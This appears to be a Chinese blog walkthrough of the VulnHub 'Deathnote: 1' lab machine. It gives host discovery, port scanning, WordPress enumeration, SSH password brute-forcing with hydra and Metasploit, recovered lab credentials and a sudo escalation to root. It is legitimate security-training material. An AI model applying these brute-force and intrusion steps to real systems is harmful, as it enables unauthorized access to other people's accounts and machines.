首页 > 其他分享 >DeathNotes靶场实操

DeathNotes靶场实操

时间:2022-11-29 16:23:23浏览次数:71  
标签:deathnote 32.136 DeathNotes ip 192.168 wordpress ssh 靶场 实操

DeathNote:01靶场实操

一 搭建环境

下载地址:Deathnote: 1 ~ VulnHub

导入Vmware即可【打开-选择ova-确定】

二 环境配置

kali ip:192.168.32.135

deathnote ip:192.168.32.X(待定)

三 渗透操作

1 确定deathnote的ip

//通过netdiscover对deathnote的ip进行探测
netdiscover -r 192.168.32.0/24

确定靶机的ip为:192.168.32.136

2 确定靶机所开放的端口

nmap -A -p 1-65535 192.168.32.136

得到共开放2个端口,22和80

3 把host和写入文件

正常访问靶机ip:192.168.32.136,发现跳转到如下界面:

和dc-2靶机类似,只需要把ip和域名写入文件/etc/hosts,保存即可

vim /etc/hosts

然后访问,即可正常

4 获取页面信息

cms:wordpress

还得知了可能存在两个用户名和一个密码

kira 、 L 以及密码:iamjustic3

5 使用wpscan和dirsearch对wordpress进行搜查

wpscan --url http://deathnote.vuln/wordpress -e u

可以扫出来kira这个用户

dirsearch -u http://deathnote.vuln/wordpress -e * -x 403 404

6 访问登录网站,找寻有用信息

访问:deathnote.wordpress/wp-login.php

输入:kira/iamjustic3

访问notes.txt,发现都是类似与密码之类的东西

复制出来,形成字典。

7 换个方向

此时80端口的信息大概已经完成,转而去搜寻22端口的内容。

22端口,ssh服务。

爆破!

两种办法:

a 通过九头蛇hydra爆破

hydra -l l -P notes.txt ssh://192.168.32.136

账号密码
l death4me

b 通过Metasploit对ssh进行爆破

//步骤
msfconsole
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set USER_FILE /home/kali/Desktop/vulnhub/deathnote/user.txt //设置用户名文件
set PASS_FILE /home/kali/Desktop/vulnhub/deathnote/notes.txt //设置密码文件
set rhosts 192.168.32.136 //设置攻击IP
set threads 10   //设置线程
set VERBOSE true   //设置打印日志到屏幕
run //执行

 

 

最后一样成功爆出

8 使用ssh登录获取信息

ssh 192.168.32.136 -l l
[email protected]'s password:death4me //密码在ssh并无回显

 

 

发现编码为brins,也可以叫做ook,解码

https://www.splitbrain.org/services/ook

https://ctf.bugku.com/tool/brainfuck

i think u got the shell , but you wont be able to kill me -kira

没用,继续找

发现一串十六进制字符,然后转码CyberChef (gchq.github.io)

passwd : passwd : kiraisevil

9 切换用户就行

sudo kira
sudo -l 满权限
sudo su
查看/root就好

标签:deathnote,32.136,DeathNotes,ip,192.168,wordpress,ssh,靶场,实操
From: https://www.cnblogs.com/GoIcejio/p/16935699.html

相关文章

  • 进入python的世界_day40_数据库——多表查询补充、Navicat的使用、多表查询实操、Pyth
    一、多表查询方式一:关键字链接innerjoinleftjoinrightjoinunion#数据准备————随便建立两表CREATETABLE`class_info`(`id`int(11)NOTNULLDEFAUL......
  • vulnhub靶场之THOTH TECH: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:THOTHTECH:1,下载地址:https://download.vulnhub.com/thothtech/Thoth-Tech.ova,下载后直接vbox打开即可。知识点:find提权、hydra......
  • vulnhub靶场隐写相关内容
    图片隐写steghideinfotrytofind.jpg#检测图片steghideextract-sftrytofind.jpg#提取图片隐写信息音频隐写工具下载地址:https://github.com/hacksudo/Soun......
  • vulnhub靶场压缩文件解密
    fcrackzip爆破fcrackzip-D-p/usr/share/wordlists/rockyou.txt-usecr3tSteg.zipjohn爆破zip2johnsecr3tSteg.zip|teehash#转换为可识别的hashjohnhashdi......
  • vulnhub靶场之EVILBOX: ONE
    准备:攻击机:虚拟机kali、本机win10。靶机:EVILBOX:ONE,下载地址:https://download.vulnhub.com/evilbox/EvilBox---One.ova,下载后直接vbox打开即可。知识点:文件包含漏洞、f......
  • 初识春秋云镜靶场
    春秋云镜靶场2022.11.26这个靶场里面有很多CVE的漏洞,有免费的也有收费的(价格有点小贵),十分推荐大家去打一打这个靶场,去巩固自己的知识这篇文章的话是我个人的思路笔记,所......
  • 红队渗透靶场之Jarbas靶场(超详细!)
    靶场考察点1.Jenkis平台的漏洞利用Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进......
  • OpenFlow协议原理及基本配置-网络测试仪实操
    一、OpenFlow协议原理1.OpenFlow技术背景●转发和控制分离是SDN网络的本质特点之一。在SDN网络架构中,控制平面与转发平面分离,网络的管理和状态在逻辑上集中到一起,底层的网络......
  • OpenFlow协议原理及基本配置-网络测试仪实操
    ​ 一、OpenFlow协议原理1.OpenFlow技术背景●转发和控制分离是SDN网络的本质特点之一。在SDN网络架构中,控制平面与转发平面分离,网络的管理和状态在逻辑上集中到一起,底......
  • 红队渗透靶场之W1R3S靶场
    W1R3S考察知识nmap的基本使用目录爆破工具的使用CMS漏洞的利用Linux用户的简单提权W1R3S靶场搭建W1R3S靶场下载地址:https://download.vulnhub.com/w1r3s/w1r3s.......